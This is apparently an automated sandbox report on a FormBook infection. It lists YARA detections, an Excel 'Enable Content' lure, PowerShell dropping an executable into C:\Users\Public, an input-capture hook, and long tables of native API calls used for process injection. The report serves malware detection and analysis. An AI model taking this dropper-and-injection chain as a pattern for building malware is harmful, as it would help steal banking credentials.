Source: powershell.exe, 00000014.00000002.438220332.000001D20BD39000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: oftmhayq.exe, 00000018.00000002.467569207.0000000000EBB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 12 Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419D60 NtCreateFile, 29_2_00419D60
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419E10 NtReadFile, 29_2_00419E10
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419E90 NtClose, 29_2_00419E90
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419F40 NtAllocateVirtualMemory, 29_2_00419F40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00419E8A NtClose, 29_2_00419E8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319910 NtAdjustPrivilegesToken,LdrInitializeThunk, 29_2_01319910
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013199A0 NtCreateSection,LdrInitializeThunk, 29_2_013199A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319860 NtQuerySystemInformation,LdrInitializeThunk, 29_2_01319860
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013195D0 NtClose,LdrInitializeThunk, 29_2_013195D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319780 NtMapViewOfSection,LdrInitializeThunk, 29_2_01319780
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319660 NtAllocateVirtualMemory,LdrInitializeThunk, 29_2_01319660
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013196E0 NtFreeVirtualMemory,LdrInitializeThunk, 29_2_013196E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319950 NtQueueApcThread, 29_2_01319950
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013199D0 NtCreateProcessEx, 29_2_013199D0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319820 NtEnumerateKey, 29_2_01319820
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131B040 NtSuspendThread, 29_2_0131B040
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319840 NtDelayExecution, 29_2_01319840
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013198A0 NtWriteVirtualMemory, 29_2_013198A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013198F0 NtReadVirtualMemory, 29_2_013198F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319B00 NtSetValueKey, 29_2_01319B00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131A3B0 NtGetContextThread, 29_2_0131A3B0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A20 NtResumeThread, 29_2_01319A20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A10 NtQuerySection, 29_2_01319A10
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A00 NtProtectVirtualMemory, 29_2_01319A00
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A50 NtCreateFile, 29_2_01319A50
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319A80 NtOpenDirectoryObject, 29_2_01319A80
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131AD30 NtSetContextThread, 29_2_0131AD30
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319520 NtWaitForSingleObject, 29_2_01319520
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319560 NtWriteFile, 29_2_01319560
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319540 NtReadFile, 29_2_01319540
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013195F0 NtQueryInformationFile, 29_2_013195F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319730 NtQueryVirtualMemory, 29_2_01319730
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319710 NtQueryInformationToken, 29_2_01319710
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131A710 NtOpenProcessToken, 29_2_0131A710
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0131A770 NtOpenThread, 29_2_0131A770
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319770 NtSetInformationFile, 29_2_01319770
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319760 NtOpenProcess, 29_2_01319760
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013197A0 NtUnmapViewOfSection, 29_2_013197A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319FE0 NtCreateMutant, 29_2_01319FE0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319610 NtEnumerateValueKey, 29_2_01319610
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319670 NtQueryInformationProcess, 29_2_01319670
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01319650 NtQueryValueKey, 29_2_01319650
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013196D0 NtCreateKey, 29_2_013196D0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419D60 NtCreateFile, 30_2_00419D60
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419E10 NtReadFile, 30_2_00419E10
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419E90 NtClose, 30_2_00419E90
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419F40 NtAllocateVirtualMemory, 30_2_00419F40
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00419E8A NtClose, 30_2_00419E8A
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369910 NtAdjustPrivilegesToken,LdrInitializeThunk, 30_2_01369910
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013699A0 NtCreateSection,LdrInitializeThunk, 30_2_013699A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369860 NtQuerySystemInformation,LdrInitializeThunk, 30_2_01369860
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369840 NtDelayExecution,LdrInitializeThunk, 30_2_01369840
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013698F0 NtReadVirtualMemory,LdrInitializeThunk, 30_2_013698F0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A00 NtProtectVirtualMemory,LdrInitializeThunk, 30_2_01369A00
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A50 NtCreateFile,LdrInitializeThunk, 30_2_01369A50
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013695D0 NtClose,LdrInitializeThunk, 30_2_013695D0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369710 NtQueryInformationToken,LdrInitializeThunk, 30_2_01369710
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369780 NtMapViewOfSection,LdrInitializeThunk, 30_2_01369780
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369660 NtAllocateVirtualMemory,LdrInitializeThunk, 30_2_01369660
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013696E0 NtFreeVirtualMemory,LdrInitializeThunk, 30_2_013696E0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369950 NtQueueApcThread, 30_2_01369950
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013699D0 NtCreateProcessEx, 30_2_013699D0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369820 NtEnumerateKey, 30_2_01369820
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136B040 NtSuspendThread, 30_2_0136B040
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013698A0 NtWriteVirtualMemory, 30_2_013698A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369B00 NtSetValueKey, 30_2_01369B00
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136A3B0 NtGetContextThread, 30_2_0136A3B0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A20 NtResumeThread, 30_2_01369A20
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A10 NtQuerySection, 30_2_01369A10
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369A80 NtOpenDirectoryObject, 30_2_01369A80
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136AD30 NtSetContextThread, 30_2_0136AD30
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369520 NtWaitForSingleObject, 30_2_01369520
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369560 NtWriteFile, 30_2_01369560
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369540 NtReadFile, 30_2_01369540
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013695F0 NtQueryInformationFile, 30_2_013695F0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369730 NtQueryVirtualMemory, 30_2_01369730
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136A710 NtOpenProcessToken, 30_2_0136A710
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0136A770 NtOpenThread, 30_2_0136A770
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369770 NtSetInformationFile, 30_2_01369770
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369760 NtOpenProcess, 30_2_01369760
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013697A0 NtUnmapViewOfSection, 30_2_013697A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369FE0 NtCreateMutant, 30_2_01369FE0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369610 NtEnumerateValueKey, 30_2_01369610
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369670 NtQueryInformationProcess, 30_2_01369670
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01369650 NtQueryValueKey, 30_2_01369650
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013696D0 NtCreateKey, 30_2_013696D0
Detected potential crypto function
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_02A9C134 24_2_02A9C134
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_02A9E568 24_2_02A9E568
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_02A9E578 24_2_02A9E578
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BBD4B8 24_2_05BBD4B8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BBB368 24_2_05BBB368
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB1290 24_2_05BB1290
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB9F90 24_2_05BB9F90
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BBC9A0 24_2_05BBC9A0
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB1AB8 24_2_05BB1AB8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_05BB1AA9 24_2_05BB1AA9
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F5D38 24_2_071F5D38
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F2920 24_2_071F2920
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F21B0 24_2_071F21B0
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F0040 24_2_071F0040
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_071F3630 24_2_071F3630
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730C5B8 24_2_0730C5B8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730BCE8 24_2_0730BCE8
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730E050 24_2_0730E050
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07302F05 24_2_07302F05
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_073017FA 24_2_073017FA
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07302A55 24_2_07302A55
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07300128 24_2_07300128
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_07300145 24_2_07300145
Source: C:\Users\Public\oftmhayq.exe Code function: 24_2_0730B9A0 24_2_0730B9A0
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_0188C134 25_2_0188C134
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_0188E568 25_2_0188E568
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_0188E578 25_2_0188E578
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074BED10 25_2_074BED10
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B2B58 25_2_074B2B58
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B2B49 25_2_074B2B49
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B28F8 25_2_074B28F8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_074B28A8 25_2_074B28A8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD5D38 25_2_07AD5D38
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD21B0 25_2_07AD21B0
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD0040 25_2_07AD0040
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07AD3630 25_2_07AD3630
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEC5B8 25_2_07BEC5B8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEBCE8 25_2_07BEBCE8
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEE050 25_2_07BEE050
Source: C:\Users\Public\oftmhayq.exe Code function: 25_2_07BEB9A0 25_2_07BEB9A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00401030 29_2_00401030
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041D96D 29_2_0041D96D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041DAB1 29_2_0041DAB1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041DCBF 29_2_0041DCBF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00402D88 29_2_00402D88
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00402D90 29_2_00402D90
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409E40 29_2_00409E40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00409E3B 29_2_00409E3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041DF98 29_2_0041DF98
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0041CFA3 29_2_0041CFA3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_00402FB0 29_2_00402FB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F4120 29_2_012F4120
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DF900 29_2_012DF900
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F99BF 29_2_012F99BF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2990 29_2_012F2990
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EC1C0 29_2_012EC1C0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013AE824 29_2_013AE824
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA830 29_2_012FA830
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D6800 29_2_012D6800
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130701D 29_2_0130701D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391002 29_2_01391002
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013020A0 29_2_013020A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A20A8 29_2_013A20A8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB090 29_2_012EB090
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013960F5 29_2_013960F5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A28EC 29_2_013A28EC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A2B28 29_2_013A2B28
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139231B 29_2_0139231B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FA309 29_2_012FA309
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F3360 29_2_012F3360
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FAB40 29_2_012FAB40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137CB4F 29_2_0137CB4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130EBB0 29_2_0130EBB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FEB9A 29_2_012FEB9A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130138B 29_2_0130138B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137EB8A 29_2_0137EB8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01328BE8 29_2_01328BE8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013823E3 29_2_013823E3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013903DA 29_2_013903DA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130ABD8 29_2_0130ABD8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139DBD2 29_2_0139DBD2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138FA2B 29_2_0138FA2B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB236 29_2_012FB236
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A32A9 29_2_013A32A9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A22AE 29_2_013A22AE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139E2C5 29_2_0139E2C5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D0D20 29_2_012D0D20
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A2D07 29_2_013A2D07
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A1D55 29_2_013A1D55
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2D50 29_2_012F2D50
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012ED5E0 29_2_012ED5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A25DD 29_2_013A25DD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2430 29_2_012F2430
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E841F 29_2_012E841F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139CC77 29_2_0139CC77
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FB477 29_2_012FB477
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139D466 29_2_0139D466
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394496 29_2_01394496
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304CD4 29_2_01304CD4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A1FF1 29_2_013A1FF1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013967E2 29_2_013967E2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013ADFCE 29_2_013ADFCE
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F6E30 29_2_012F6E30
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139D616 29_2_0139D616
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F5600 29_2_012F5600
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0135AE60 29_2_0135AE60
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01381EB6 29_2_01381EB6
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A2EF7 29_2_013A2EF7
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00401030 30_2_00401030
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041D96D 30_2_0041D96D
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041DAB1 30_2_0041DAB1
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041DCBF 30_2_0041DCBF
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00402D88 30_2_00402D88
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00402D90 30_2_00402D90
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00409E40 30_2_00409E40
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00409E3B 30_2_00409E3B
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041DF98 30_2_0041DF98
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0041CFA3 30_2_0041CFA3
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_00402FB0 30_2_00402FB0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01344120 30_2_01344120
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0132F900 30_2_0132F900
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013499BF 30_2_013499BF
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0134A830 30_2_0134A830
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013FE824 30_2_013FE824
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E1002 30_2_013E1002
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013520A0 30_2_013520A0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F20A8 30_2_013F20A8
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0133B090 30_2_0133B090
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F28EC 30_2_013F28EC
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F2B28 30_2_013F2B28
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0134A309 30_2_0134A309
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0134AB40 30_2_0134AB40
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0135EBB0 30_2_0135EBB0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013D23E3 30_2_013D23E3
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E03DA 30_2_013E03DA
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013EDBD2 30_2_013EDBD2
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0135ABD8 30_2_0135ABD8
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013DFA2B 30_2_013DFA2B
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F22AE 30_2_013F22AE
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E4AEF 30_2_013E4AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01320D20 30_2_01320D20
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F2D07 30_2_013F2D07
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F1D55 30_2_013F1D55
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_01352581 30_2_01352581
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E2D82 30_2_013E2D82
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0133D5E0 30_2_0133D5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013F25DD 30_2_013F25DD
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_0133841F 30_2_0133841F
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013ED466 30_2_013ED466
Source: C:\Users\Public\oftmhayq.exe Code function: 30_2_013E4496 30_2_013E4496
